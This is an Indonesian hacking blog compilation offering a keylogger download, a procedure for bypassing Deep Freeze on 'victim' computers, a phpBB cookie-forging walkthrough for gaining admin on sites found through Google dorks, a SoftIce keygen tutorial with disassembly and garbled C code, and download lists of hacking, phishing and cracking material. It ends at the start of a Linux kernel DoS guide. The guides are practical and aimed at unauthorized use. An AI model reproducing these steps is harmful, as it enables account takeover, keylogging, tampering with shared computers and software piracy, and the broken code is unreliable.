Keylogger untuk all windows

Ini coba keylogger asli . . dijamin 100% berhasil
gue udach nyoba berapakali  hasil.y berhasil . .
tpi kalau mw keylogger.y tdk terhapus kalau direstar . .
matiin ajah deep freeze.y . . dijamin berhasil
klik disini
software keylogger.y
disini
 

Hacking Deep Freeze Semua Versi


Hacking Deep Freeze semua versi.. [DIJAMIN]
Sering kali kita mendapati komputer dengan Deep Freeze aktif sementara kita tak tahu apa passwordnya, g peduli itu komputer teman atau komputer kita sendiri. Pernah juga saya temui icon tray deep Freeze tak mau muncul sehingga tidak bisa memasukan password Deep Freeze. Berikut cara mengatasi masalah tersebut, intinya  adalah mengganti file yang digunakan Program Deep Freeze dengan file frogram Deep Freeze yang sudah kita “jinakan” .
1.pilih Komputer sumber
Pilih komputer sumber yang sudah diinstal Deep Freeze dan status Deep Freeze dalam keadaan “Thawed” (ditandai dengan tanda silang pada icon tray  Deep Freeze ),jika masih “Froozen”  maka rubah dulu statusnya menjadi Thawed
2.Booting ke Linux
jika di komputer sumber belum tersedia linux maka booting ke sytem linux bisa di lakukan melalui USB bootable. Dengan bantuan program unetbootin. cara buatnya bisa baca tutorial membuat bootable linux di flasdisk
3.  copy file
a. Setelah masuk pada linux, copy file ” Install C-0″ yang ada di sytem\Program Files\Faronic\Deep Freeze
b. copy file “Persi0.sys” pada drive  sytem (sytem yang dimaksud adalah drive sistem C  pada windows)
c. simpan file tadi dalam flasdisk yang akan digunakan sebaga media transfer file
deep Freeze target4.booting ke linuk pada komputer target (komputer yang akan di hack Deep Freeze-nya atau komputer yang Deep Freeze-nya rusak).jika tidak tersedia pilihan menu booting ke linux bisa dilakukan melalui bootable linux yang telah dibuat dengan program unetbootin tadi
5.mengganti file
Ganti file “Persi0.sys” di sytem (drive C punyanya windows) dengan file yang telah di copykan dari komputer sumber sebelumnya. Pilih replace.
Ganti pula file “ Install C-0” yang ada di sytem\Program Files\Faronic\DeepFreeze .pilih replace.(sytem yang dimaksud adalah drive C pada windows)
6. Restart computer anda dan masuk ke windows.
7.lihat ada icon tray deepfreeze ada apa tidak. Jika proses berjalan normal icon tray deep freeze ada dan diberi tanda silang (status Thawed). Jika tidak ada icon tray-nya bias di cek status Deep Freeze-nya  dengan cara:
Run>regedit, HKEY_LOCAL_MACHINE\SOFTWARE\Faronic\Deep Freeze, lihat status Deep Freeze pada DF Status.
8.proses hacking selesai, semoga semua berjalan normal dan dapat digunakan deng bijak
File untuk mengganti tersebut sudah saya sediakan dalam paket hacking Deepfreeze tinggal di download aja di ziddu, password Deep Freeze: “loveHINATA”. Pesan saya gunakan cara ini secara bijak, jangan digunakan untuk berbuat jahat, karena sebaik-baik manusia adalah yang bermanfaat bagi orang lain
Cara ini udah ane praktekan di lima komputer korban dengan versi deepfreeze yang berbeda dan berhasil. Deep freeze yang digunaka adalah deepfreeze 7.0, bisa download disini
Pesan saya “gunakan cara ini secara bijaksana.”
 

Facebook Hacking

 

1000 Ebook Lengkap Teknik Hacking

.
Sangat sulit mencari tutorial Hacking secara lengkap. Apalagi jika anda adalah seorang newbie. Saya sarankan untuk mengunjungi dan bergabung di forum-forum hacking terkenal seperti Kaskus.us, Indowebster.com, Astalavista atau X- Code (forum hacking Indonesia). Pada forum tersebut dijelaskan ratusan teknik hacking populer yang banyak digunakan. Namun hal tersebut masih repot karena harus tetap online untuk mengupdate infomasinya.

1000 Hacking Tutorial merupakan ebook yang berisi kumpulan teknik hacking populer yang banyak digunakan. Dalam ebook direktori sebesar 10MB tersebut tersimpan lebih dari 1000 teknik hacking. Anda bisa mencobanya satu persatu. Saya jamin kompulan teknik hacking yang terangkum dalam ebook ini mampu mengubah pola pikir anda untuk memasuki dunia hacker.

Berikut beberapa teknik hacking yang dijelaskan dalam buku ini:

- Membuat Bootable XP dalam sebuah CD
- Membuat shortcut One Click Shutdown dan Restart
- Membuat Universal Ghost dalam CD maupun FD
- Teknik Debuging
- Menghapus file yang tidak dapat terhapus
- Panduan pemilihan kamera digital
- Konsep DirectX
- Teknik kompresi
- Teknik menghilangkan Send Error Report
- Teknik memanipulasi logi windows
- Download musik secara lagal
- Download paypal tanpa membayar
- Download dari FTPz
- Download MP3 tanpa filesharing
- Download Video dan MP3 dengan Media Player
- Download Timeframe
- DVD Copy-Ripping
- Teknik disconnect dan reconnect fari broadband
- Teknik mudah mencari serial number dengan Google
- Teknik Hacking Ebay
- Keyboard Shortcut
- Hacking administrator windows
- Teknik Hacking unlimited bandwidth dari hosting gratis
- Google Hacking
- Google tips dan trik
- Rahasia Google
- Memperbaiki Harddisk
- Hardware Firewall
- Teknik Memblok website tanpa software
- Tweeking windows
- Teknik Hacking Bios
- Konversi file system
- Teknik SEO
- Key Generator
- Menghapus DRM Protection Video
- Teknik pencarian Rapidshare
- Teknik menyembunyikan files
- Menyelamatkan komputer dari crash
- Setting DNS
- Setting FTP server
- Setting direct connect
- Setting proxy
- Setting http request
- Hacking Newsgroup
- Linux
- Menginstal Linux
- Hacking IRC
- Mencari file di IRC
- Hacking E-mail
- Phising
- Keylogger
- Hacking foto
- Hacking database
- Hacking faq
- Hacking TRW
- Hacking wabpages
- Hacking Netbios
- Phreaking
- Spyware
- Virus
- Trojan
dan seterusnya

DOWNLOAD 1000 Teknik Hacking:
LINK DOWNLOAD 1
LINK DOWNLOAD 2
LINK DOWNLOAD 3
LINK DOWNLOAD 4
 

Tutorial Hacking Terbaik

Ebook hacking adalah sarana belajar yang cukup baik bagi seorang hacker pemula (newbie). Setidaknya teknik-teknik dasar yang dijelaskan di dalamnya menjadi pondasi kokoh untuk beranjak ke tingkat lebih tinggi. Tidak perlu bingung mencari ebook hacking yang mengulas berbagai teknik hacking dasar. Para sesepuh hacker dengan senang hati membundlenya dalam satu paket siap download. Namanya Hacking E-book AIO.


Hacking E-book AIO berisi kumpulan ebook hacking populer. Dari dasar-dasar hacking, hacking administrator, hacking web, hacking game console, sampai hacking wireless. Anda tidak perlu lagi mencari kesana-sini ebook hacking. Tinggal download semua sudah tersedia.

Berikut koleksi ebook hacking yang ada di dalamnya:

Hacking for Dummies
Hacking Intranet Websites
Hacking Techniques
Hacking The Cable Modem
Hacking The Linux
Hacking Web Applications
Hacking Windows XP
Hacking PSP
The Art of Deception
The Art of Intrusion
Network Security Hacks
Paypal Hacks
PC Hacks
Simple Hacks
The Database Hacker Handbook
Wireless Hacking
Wireless Hacks
Bluetooth Hacking
Ethical Hacking
Google Hacks
Hack & Crack
Hack Attacks Testing
Hack IT
Hack Proofing Your Network 1st
Hack Proofing Your Network 2nd
Hack Proofing Your Web Server
Hack The Net
Hack Xbox 360
Hackers Black Book
Hacking Firewalls And Networks
Hacking a Coke Machine
Hacking and Network Defense
Wireless Network Hacks & Mods

DOWNLOAD Hacking E-book:
LINK 1 (Rapidshare)
LINK 2 (Hotfile)
Link 3 (Uploding
 

Tutorial Hacking Indonesia

.
E-code Magazine adalah majalah komputer, internet, hacking dan security bahasa Indonesia dengan media murni PDF. Seluruh materi X-Code Magazine dapat didownload, dibaca, dimodifikasi serta disebarluaskan secara bebas untuk tujuan bukan komersial, dengan syarat tidak menghapus atau mengubah atribut penulis. Tujuan E- code Magazine adalah menyebarkan ilmu-ilmu komputer, internet dan hacking untuk tujuan positif.

X-Code Magazine 01
Apakah kamu Hacker?. Kelemahan pada deep freeze standar 5.20 trial version. Membuat deepfreeze trial menjadi full. Memeriksa keamanan webserver. Menghubungkan internet melalui LAN dengan windows XP. Konfigurasi windows secara manual memakai regedit. Membuat program penampil text dengan bahasa assembler. Membuat program link website dengan turbo basic. Membuat program pilihan dengan turbo pascal. Membuat program tampil sederhana dengan C++. Tips dan trik IRC. Teknik hacking local root on fedora core2. Fungsi windows API. Diary.exe, apa dan bagaimana?. Implementasi teknik stealth pada virus. Connect back melalui bug CGI.
DOWNLOAD

X-Code Magazine 02
Utak-atik program dengan Reshack. Ovelclock VGA Card nVidia dengan RivaTuner. hacking database Visual Foxpro. Membuat program sharing files dan folder dengan visual basic. Melakukan decompiler program visual basic dengan VbReFormer. Pandungan menggunakan Yahoo Group. Browser folder server tanpa fungsi cmd. Searching isi database MySql via php script. 10 Penipuan terbanyak di internet. Waspada Keylogger warnet. MySQL Exploit via PHP Script. Cara menjual dan membeli E-Gold. Instalasi CMS CuteNews. Mengatasi spyware secara darurat. Small IMS.
DOWNLOAD

X-Code Magazine 03
Cara membuka akses keseluruhan database. Membuat file super hidden. Attack: Script sanitasi input. Instalasi Apache, PHP, MySQL pada system window XP. Lupa passsword Yahoo. Dasar Borland C++ Builder. Hack website shopping dengan Shopupload.asp. Deface dengan PHP bugs. Compilasi dengan LCC dan permasalahanya. Mencari alamat target In One Hosting.
DOWNLOAD

X-Code Magazine 04
Mengakses registry dari DOS. Tutorial AJAX untuk mempercepat akses situs. Mempercantik tampilan UFD. Gutbai.exe. Teknik cracking CD-Lock. Kelemahan folder yang dilock. Mod_rewrite pada Apache. Koneksi Oracle dengan PHP. SSH Forwading. Mendisable account di windows xp. Membobol billing explorer versi 4.38.
DOWNLOAD

X-Code Magazine 05
Instalasi Oracle10g di Linux RHELAS3. Instalasi webserver IIS. Modifikasi file executable dengan PE explorer. Memberi logo pada properties My Computer. Mencurangi semua jenis billing warnet. Membuat web dengan Aura CMS. Mengatur sistem komputer tanpa melalui registry. Proteksi file exe dari virus. Teknik hacking winrar v3.62. mod_rewirte untuk wordpress. Trojan dan remoter PC berbasis windows. Melakukan jebakan hacking friendster.
DOWNLOAD

X-Code Magazine 06
Mengenal Hexadecimal, Binary dan ASCII. Honeypot. Animasi GIF dengan Adobe Image Ready. Membuat file yang mencurigakan. Tip-trik animasi marquee. Modifikasi aplikasi dengan PE Explorer dan ResHacker. Animasi Marquee dengan Frontpage. Sending fake SMS number dengan Alpha. Pemrograman HACK. Chatting Mirc dengan Handphone. Memanfaatkan kelalaian admin pada xWin. Liputan demo Hacking.
Download

X-Code Magazine 07
Pemrograman HACK Tool II. Bermain internet dengan aman. Tip-trik membuat Skin WInamp. Cracking translator XP Enterprise edition. Membuat software portable. Password Cracking. Menembus proteksi ebook Studio kata-kata. PHP Injection!. BOT Scanner. Crack planet source code combo CD. Liptan seminar hacking. Liputan demo hacking. Liputan lomba hacking.
DOWNLOAD

X-Code Magazine 08
10 Tools favorit Hacker dan pakar keamanan komputer. Virtual Box. Merebut admin pada sistem operasi. Mempercepat firefox. Menjebol password PC Security. Pemrograman Hack Tools III. Membuat tips of the day saat logon. Membuat anti viur pada flash disk. Digital blaster dan network flooder.
DOWNLOAD

X-Code Magazine 09
XRemote vers2.0. Transfer file via bluetooth di linux. Membuat program pembaca teks dengan visual basic. Cracking software. Crack style XP versi 2.0. Pemrograman Hack Tools versi IV. Progam sederhana dengan Turbo Pascal 7.0 for DOS. Membuat windows menjadi kota mati. Mengubah isi regedit yang didisable oleh admin. Mengubah tampilan Internet Explorer. Efek animasi Teks Glow dengan adobe flash.
DOWNLOAD

X-Code Magazine 10
Ubuntu 8.04. Beetrap V.1.0 untuk komputer pribadi. Bot Perl, DDOS dan mass scanning. Mengubah format nilai textbox secara massal. Virus dengan VBS Generator. Manual Cheat game Alien Shooter. Shutdown komputer via web menggunakan HTML+VB Script. Membobol password PC Security. Membuat Keygen untuk TestCodeWarrior. Mengamankan file penting. Mengganti Mac Address Network Card dengan Macchanger. Mengakali masa pakai Nitro PDF. Pemrograman HACK V. Membanjiri pesan ke HP melalui bluetooth. Cara curang cepat drop entrecard. Membuat program kamuflase folder dengan visual basic. Menambah dan menghapus item pada menu klik kanan.
DOWNLOAD

X-Code Magazine 11
Tes aplikasi lunak buatan programmer lokal. YF- Crypt V1.0. Wirelles Hacking di linux. Manual crack s40 theme studio. Tips mereset kapasitas USB Flashdisk yang penuh. Pemrograman Hack Tools VI, port scanner. Cracking Audio Editor pro. Intup folder yang diproteksi Folder Access Ver.2.0. Memunculkan kembali file super hidden. Hack Deep Freeze 6. X-Code Linux. cracking software pulsa refill master 239. Penggunaan IDM - Site Grabber. Bypassing firewall windows XP SP2. Membobol database billing explorer. Blind SQL Injextion. Dasar- dasar phising. Membuka semua fitur windows. Backdooring target dengan Connectback.
DOWNLOAD

X-Code Magazine 12
YF-Keylogger vers.1.0. YF-KeyInMyFD vers.1.0. Cracking ASCII Adt Maker 1.6. Mencegah Virus VBS berkembang biak. Trik membaca password foleder lock. Reset passsword software direktory security. Pengunci folder dengan Batch Programming. Tampilan dekstop lebih atraktif dengan javascript. Mengubah akses limited menjadi administrator pada windows XP. Hacking remote komputer dari jarak jauh. Memoles windows XP saat logon. Mencuri ebook dengan kekuatan pikiran. Spoonfed Hacking-How to crack WEP. Pemrograman Hack Tools VII. Empat langkah mudah SQL Injection. Menjalankan file phyton pada hacked server. Mengubah document root pada localhost. Membuat Keylogger sendiri. Mengunci windows. Membuat program management IP.
DOWNLOAD

X-Code Magazine 13
Mengembalikan password Windows XP/Vista dengan Ophcrack live CD. Botnet. Cracking Plato Video. Browsing, The way I am. Membuat program pembajak isi Flash Disk. Mengenal PPI Card 8255 MODE 0. Program COntrol 12 LED. Mengganti pesan Welcome di Windows Logon. Penggunaan shell script dalam jaringan. XCode Web Linker. FD Protect Guard. Key Generator untuk aplikasi PDF Password Remover. Blind SQL Injection Joomla. Membuat Regedit alternatif. Melewati multi proteksi akses web www.indowebster.com. Menampilkan kembali data yang tersembunyi dengan Total Commander.
DOWNLOAD

X-Code Magazine 14
Intip password Rampok V.2.0. Cracking Game House 2008. Teknik cracking Hex Workshop. Mengubah gambar pada booting Slax Portable USB Linux. Mencuri data penting dengan USB Flash drive. Menyamar sebagai Googlebot via mozilla firefox. Packer Checker. Menembus proteksi password pada program dengan trik Win32 Hook. MakeCAB dan Expand dengan VB6. Menyembunyikan folder pribadi dibelakang foto. Menghidupkan windows yang menjadi kota mati. Rahasia dibalik ekstensi *.*zip. Cracking LC3 - password editing & recovery tools. cara unik hindari virus.
DOWNLOAD
 

Tutorial Deface PHPBB / Cookie

.
Langkah-Langkah Deface PHPBB/PHPBB2 Loser_cs_20
1. Download browser Mozilla FireFox

2. Download pluginnya yg bernama LiveHTTPHeader
download di bawah
cari yg paling baru

3. selanjutnya cari target dengan Uncle Google dgn syntax :
phpBB site:[terserah apa aja]

4. setelah itu buka plugin yg kita download tadi di Tools -> LiveHTTPHeader

5. Ingat, isi LiveHTTPHeader harus kosong

6. buka situs target, dengan begitu LiveHTTPHeader akan mengambil semua cookie yg tercatat di halaman target


7. setelah halaman sukses terbuka ditandai dengan tanda "done" di bawah browser, langkah selanjutnya adalah mengklik LiveHTTPHeader di bagian tengahnya dilanjutkan mengklik opsi Replay..

8. setelah LiveHTTPReplay terbuka liat bagian seperti dibawah ini pada LiveHTTPReplay...

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b

9. Hapus bagian yg belakang setelah tanda semi colon (

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b

\_______________hapus bagian ini_________________/

jadinya akan seperti ini :

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D

10. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi

11. selanjutnya perhatikan langkah di bawah ini:

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D
\________hapus bagian ini dan di ganti dengan:

Cookie: phpbb2mysql_data=a:2{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}

12. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.

13. perhatikan lagi langkah ini:

Cookie: phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}
\___________________________bagian ini jg digantilagi_______________________________/

menjadi seperti ini:

Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

14. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.

15. selesai, silakan liat halaman target, kalo anda beruntung anda mendapatkan full admin.
Silakan pergi ke bawah halaman dan lihat opsi "Go To Administration Panel" telah muncul.
 

Membuat Key-Generator


Key generator adalah program crack yang dibuat khusus untuk mengkalkulasi registration code, dari misalnya, nama kita gitchuuu ! 

target : 
Dekstop Themes 1.78 (http://www.lss.com.au) 

Tools : 
SoftIce 3.x 
Borland Turbo Assembly (Jika mau bikin key generator). 


Desktop Themes 1.78 adalah program keren yang gedenya ngak nyampe 500 kb untuk install themes themes favorit kamu. Buat apa coba nginstall Microsoft Plus, yang gedenya bermega mega, cuman buat masang themes. Tapi ngak cuman itu. Program ini pokoknya bener bener kembaran dari ms Plus! cuman ditulis dengan "bright" programmer, jadi jauh lebih kecil ukurannya :)

Nah, kalau kamu jalankan programnya, coba klik di Edit Themes, Ada registration Dialog disana. Program akan jalan, bila kita klik Ok. Registered User ngak akan dapet dialog kaya gini, walau begitu program ini tetap akan berjalan full, kecuali dialog boxnya itu yang sedikit mengganggu.

Ok, pasang breakpoint di tempat biasanya program ngambil serial. "BPX GetDLGitemTexTa" dan "BPX getWindowTexTa". Isikan nama "Free User" , tanpa kutip. Isikan "123454321" untuk serial number. Ok, sekarang boleh pencet enter, kamu kembali ke SI. Rupanya GetDlgItemtexta, yang beruntung kali ini. Tekan F5 karena sekarang program baru membaca user name, lalu tekan F12 untuk kembali ke badan program. Kamu akan mendarat disini :

:00409EF2 FFD6 call esi "Call User32|Getdlgitemtexta"

:00409EF4 6814574200 push 00425714 "kamu disini, coy !"
:00409EF9 8D8DC0FDFFFF lea ecx, dword ptr [ebp+FFFFFDC0]
:00409EFF E84292FFFF call 00403146 "ngak penting"
:00409F04 807DC400 cmp byte ptr [ebp-3C], 00 "Periksa apa udah dimasukin user name ?"
:00409F08 7414 je 00409F1E "Go to Hell, kalau belum"
:00409F0A 8D45C4 lea eax, dword ptr [ebp-3C] "eax = offset user name, kalau kamu ketik D EAX, setelah trace disini, akan terlihat username kamu"
:00409F0D 8D8DC0FDFFFF lea ecx, dword ptr [ebp+FFFFFDC0]
:00409F13 50 push eax

:00409F14 680C574200 push 0042570C
:00409F19 E81397FFFF call 00403631 "Call yang ngak penting"

:00409F1E 807DEC00 cmp byte ptr [ebp-14], 00 "Periksa udah dimasukin reg key, belon ?"
:00409F22 7414 je 00409F38 "lanjutkan kalau udah"
:00409F24 8D45EC lea eax, dword ptr [ebp-14] "eax = offset reg key, teken d abis trace disini, akan terlihat reg key kamu"
:00409F27 8D8DC0FDFFFF lea ecx, dword ptr [ebp+FFFFFDC0]
:00409F2D 50 push eax

:00409F2E 6804574200 push 00425704
:00409F33 E8F996FFFF call 00403631 "ngak penting, coy !"

:00409F38 57 push edi
:00409F39 E86CA9FFFF call 004048AA "very Important Call !"
:00409F3E 85C0 test eax, eax "the famous test"
:00409F40 59 pop ecx
:00409F41 0F84B2000000 je 00409FF9 "loncat jika registrasi salah"
:00409F47 6A00 push 00000000

:00409F49 68C0504200 push 004250C0

:00409F4E 68AC6B4200 push 00426BAC
:00409F53 53 push ebx

Perhatikan Call pertama, dan kedua. Call tsb gua tandain ngak penting ! Kenapa gua tahu ? Begini, ini adalah prinsip assembly, sebelum memanggil(call) suatu fungsi data harus dipush terlebih dahulu ke dalam stack. Dengan memberikan perintah "d ..." sebelum call, gua tahu bahwa data yang dipush, bukanlah data berharga seperti user name dan key kita :). Tapi kalau kamu belum yakin, kamu bisa trace satu satu, seperti gua. Call tsb sepertinya mempersiapkan di registry untuk mencatat nama dan reg code, jika benar.

Perhatikan Call pada offset 00409f39 ! Call ini adalah Call yang sangat penting, dia akan memberikan nilai pada EAX(Accumulator Register) = 0, jika kondisi salah (password tidak cocok dengan username, dengan kata lain password salah !), dan akan memberikan Eax = 1 jika benar. Perhatikan Test sesudahnya, test adalah meng"AND" kan suatu variabel, atau register, atau apa saja, tanpa merubah nilai dari masing masing variabel/ data/ register tsb. Lihat sesudah POP ecx, ada lompat bersyarat, ini akan lompat jika reg code salah.

Kamu sudah bisa mempatch pada lompat bersyarat tsb, (mungkin dengan merubahnya menjadi nop ?, entahlah banyak cara tapi gua belum coba). Tapi kita disini mo' belajar kan ? Kita akan me"rasa"kan code code assembly ini lebih dalam. Trace ke dalam Call di offset 00409F39 tsb ! Caranya, jika selama ini anda menekan F10 (trace), maka sekarang ketika pointer sedang berada di offset 00409F39 tsb, tekan F8, untuk masuk kedalam Call tsb, kamu akan berada disini :

:004048AA 55 push ebp
:004048AB 8BEC mov ebp, esp
:004048AD 81EC48020000 sub esp, 00000248
:004048B3 8B4508 mov eax, dword ptr [ebp+08]
:004048B6 53 push ebx
:004048B7 56 push esi
:004048B8 57 push edi
:004048B9 80A04C09000000 and byte ptr [eax+0000094C], 00
:004048C0 8DB04C090000 lea esi, dword ptr [eax+0000094C]

Sampai sini program akan mempersiapkan penulisan key pada registry.

:004048C6 6814574200 push 00425714
:004048CB 8D8DB8FDFFFF lea ecx, dword ptr [ebp+FFFFFDB8]
:004048D1 C745B802000080 mov [ebp-48], 80000002
:004048D8 C745FC28000000 mov [ebp-04], 00000028
:004048DF C745F814000000 mov [ebp-08], 00000014
:004048E6 33FF xor edi, edi
:004048E8 E859E8FFFF call 00403146
:004048ED 8D45FC lea eax, dword ptr [ebp-04]
:004048F0 8D8DB8FDFFFF lea ecx, dword ptr [ebp+FFFFFDB8]
:004048F6 50 push eax
:004048F7 8D45D0 lea eax, dword ptr [ebp-30]
:004048FA 50 push eax

Persiapkan penulisan Regname, pada registry :

:004048FB 680C574200 push 0042570C
:00404900 E8B0EDFFFF call 004036B5
:00404905 85C0 test eax, eax "Sudah dimasukkan regName ?"
:00404907 0F84A5000000 je 004049B2 " Go 2 Hell, jika belum !"
:0040490D 8D45F8 lea eax, dword ptr [ebp-08]
:00404910 8D8DB8FDFFFF lea ecx, dword ptr [ebp+FFFFFDB8]
:00404916 50 push eax
:00404917 8D45BC lea eax, dword ptr [ebp-44]
:0040491A 50 push eax

Persiapkan pernulisan regcode pada registry :
|
:0040491B 6804574200 push 00425704
:00404920 E890EDFFFF call 004036B5
:00404925 85C0 test eax, eax " Apa udah dimasukkan regcode ?"
:00404927 0F8485000000 je 004049B2 "cabut jika belum !"
:0040492D 8D45D0 lea eax, dword ptr [ebp-30]

Lihat apakah user name = "RHooD" , tanpa kutip :

:00404930 68FC564200 push 004256FC
:00404935 50 push eax
:00404936 E855E60100 call 00422F90 " Apakah user name = "RHooD" ?"
:0040493B 59 pop ecx
:0040493C 85C0 test eax, eax " jika ya lompat !"
:0040493E 59 pop ecx
:0040493F 7471 je 004049B2
:00404941 8D45D0 lea eax, dword ptr [ebp-30]

Periksa apakah user name = "romeo", tanpa kutip :

:00404944 68F4564200 push 004256F4
:00404949 50 push eax
:0040494A E841E60100 call 00422F90 " periksa apakah user name = "romeo" ? "
:0040494F 59 pop ecx
:00404950 85C0 test eax, eax " Ok, lompat kalau benar !"
:00404952 59 pop ecx
:00404953 745D je 004049B2
:00404955 8D45D0 lea eax, dword ptr [ebp-30]

Periksa apakah user name adalah "fACTOR '98" :

:00404958 68E8564200 push 004256E8
:0040495D 50 push eax
:0040495E E82DE60100 call 00422F90 " Apa username = fa... ?"
:00404963 59 pop ecx
:00404964 85C0 test eax, eax
:00404966 59 pop ecx
:00404967 7449 je 004049B2 " jika ya lompat !"
:00404969 8B4DFC mov ecx, dword ptr [ebp-04]
:0040496C 33C0 xor eax, eax "Perhatikan ini, eax = 0"
:0040496E 49 dec ecx "ecx = panjang user name, dalam hal ini 9 !"
:0040496F 85C9 test ecx, ecx
:00404971 7617 jbe 0040498A

Ok, lihat diatas, program akan memeriksa apakah sudah dimasukkan username, regcode, dan diperiksa jika username = nama nama cracker terkenal diatas (menarik ya ?), jika ya maka program tidak perlu lagi mencari kode, tapi kamu langsung ditendang keluar !

Sekarang perhatikan baik baik !!! Ini adalah jantung pertahanan program ini, pusatkan konsentrasi !!! :

:00404973 0FBE5405D0 movsx edx, byte ptr [ebp+eax-30]
"edx = kode ascii dari huruf depan nama kita, dalam hal ini adalah F "
"Jika kamu memberikan perintah, setelah offset ini ditrace, "? edx", tanpa kutip seperti biasa, maka akan keluar kode ascii dalam hexa, lalu kode ascii dalam decimal, lalu hurufnya "

:00404978 8BD8 mov ebx, eax "ebx = eax , perhatikan pada offset 00404969 !, Eax akan digunakan sebagai counter !"
:0040497A 83E301 and ebx, 00000001 "AND EBX dengan 1"
:0040497D 43 inc ebx " ebx = ebx+1"
:0040497E 0FAFD3 imul edx, ebx "edx=edx*ebx"
:00404981 03D0 add edx, eax "edx=eax + edx"
:00404983 03FA add edi, edx "edi=edi+edx"
:00404985 40 inc eax "eax=eax+1"
:00404986 3BC1 cmp eax, ecx " eax = 9 (panjang regname) ?"
:00404988 72E9 jb 00404973 " Jika belum lompat kembali ke 00404973"

perhatikan baik baik looping diatas, setelah eax = 9, maka edi akan berisi suatu nilai dalam hexa, yang didapat dari hasil olahan regname kita !


:0040498A 81F704446482 xor edi, 82644404 "eXlusif Or Edi, dengan 82644404"

Hasil dari EDI di XOR dengan konstanta(nilai tetap), yakni 82644404h

:00404990 7D02 jge 00404994
:00404992 F7DF neg edi "negatifkan nilai tsb"


:00404994 8D45BC lea eax, dword ptr [ebp-44] "eax = regcode"

:00404997 50 push eax " dorong eax ke stack"

:00404998 E8D34A0100 call 00419470 "Call ini akan merubah regcode kita dari string data, ke numerik data !"

Perhatikan baik baik ! RegCode kita yakni 123454321, dimasukkan dengan tipe data string kan ? Nah, sedangkan kita tahu bahwa hasil edi, yakni manipulasi dari regname kita, adalah data numerik. Tidak mungkin membandingkan numerik dengan string, karena itu regcode kita dirubah dulu menjadi data numerik. Darimana gua tahu kalau call tsb merubah string -> numerik ?, Ya, dengan ditrace tekan F8, ketika pointer sedang berada di offset Call tsb.

Setelah Call ini dieksekusi, eax akan berisi NILAI REGNUM KITA dalam bentuk NUMERIK, tekan "? eax" maka akan terlihat di command line : "0123454321, dalam hex" lalu " 0123454321(decimal)", dan kode ascii.

:0040499D 3BF8 cmp edi, eax

Bandingkan edi, yang berisi hasil manipulasi program dari regname, dengan kode yang kita masukkan(dalam tipe numerik, sekarang) !

:0040499F 59 pop ecx
:004049A0 7510 jne 004049B2 "Kalau tidak sama, cabut dah !"
:004049A2 8D45D0 lea eax, dword ptr [ebp-30]
:004049A5 50 push eax
:004049A6 56 push esi


:004049A7 FF1514D54200 Call dword ptr [0042D514]


:004049AD 6A01 push 00000001
:004049AF 58 pop eax
:004049B0 EB02 jmp 004049B4 "lompat !"

Nah, dibawah ini adalah hasil lompatan dari berbagai syarat yang salah dari rutin program diatas, lihat XOR eax, eax. Ini akan mengnolkan eax, oooh pantes, kalau regnum salah eax= 0"

:004049B2 33C0 xor eax, eax

Dibawah ini, adalah hasil dari lompat "baik" diatas, eax tidak 0 karena baris xor eax,eax tidak pernah dieksekusi !

:004049B4 5F pop edi
:004049B5 5E pop esi
:004049B6 5B pop ebx
:004049B7 C9 leave
:004049B8 C3 ret "Kembali ke badan program !"

Nah, setelah ini lu pasti sudah mengerti bagaimana cara program memeriksa regnum kan ? jadi edi harus sama dengan eax, kita tinggal mengisikan regnum dengan nilai edi (? edi) dalam decimal. Gua harap elu juga udah bisa bikin key generator sekarang. Dan satu saran coba dengan user name lain ! :)

Ok, sekian dulu deh tutorial dari gua. Jika ada pertanyaan e-mail gua segera, gua dengan senang hati pasti ngejawab ! :)



Sebagai Bonus, ini gua tambahkan rutin keygeneratornya :

#include
#include
#include
main()
{
int i ;
unsigned long serial=0 ;
char username[25] ;
clrscr() ;
printf ("Key Generator DesktopThemes 1.xx by flag eRRatum\n") ;
printf ("Visit our Page at http:\\\\all.at\\ekh\n") ;
printf ("Please enter your username : ") ;
gets(username) ;
for (i=0;iserial^=0x82644404 ;
printf("This is your Code : %lu\n",(~serial+1)) ;
textcolor(LIGHTRED) ;
cprintf("Please Visit our page for more cracks.") ;
return (0) ;
 
Deep freeze mungkin bagi Anda yang sudah mentahui kegunaan deep freeze akan mengatakan bahwa inilah salah satu cara efectif untuk menangkal virus masuk terlalu dalam ke suatu program dan bagi anda yang belum terlalu mengenal deep freeze, maka akan saya beritahu apa saja kegunaan deep freeze, cara kerjanya, dan manfaatnya bagi anda.



deep freeze adalah software Block restore yang di ciptakan oleh perusahaan faronics yang bekerja di bidang pembuatan Software. deep freeze di ciptakan untuk menjaga dan mengorganisir files yang ingin di simpan secara permanen, terutama pada Local disk Sytem.

Cara kerja deep freeze adalah membekukan semua file yang berada computer pada waktu pertama penginstalan program ini. program dapat di ubah hanya pada saat anda menggunakan komputer, bila komputer ke restart maka file yang anda ubah akan kembali ke settingan pertama seperti sebelum di restart.

Udah ah capek untuk lebih tau deepfreeze itu apa coba cari digoogle aja ya, sekarang saya cuma mau ngasi aplikasi untuk melumpuhkan Deepfreeze.
Silakan Download:


Cara menggunakannya:
1. Matikan dulu semua anti virus yang aktif.
2. Exctrak file undeepfreeze tersebut.
3. Double klik aja aplikasinya
4. Klik tombol yang ada ditengah-tengah aplikasi tersebut
5. Jika sudah selesai/berubah warnanya silakan buka DeepFreezenya
CTRL + Shif + Klik ikon Deepfreeze disudut kanan komputer
6. Klik Login tanpa mengetikkan password.
7. Selesai.
 

Denial Of Service [DoS] Linux Kernel 2.6.36


Kali ini kami akan berbagi mengenai bagaimana cara DoS menggunakan tools berikut terhadap linux server. DOS kali ini akan menggunakan kelemahan pada bugs IGMP.
Oke yang perlu dipersiapkan adalah:
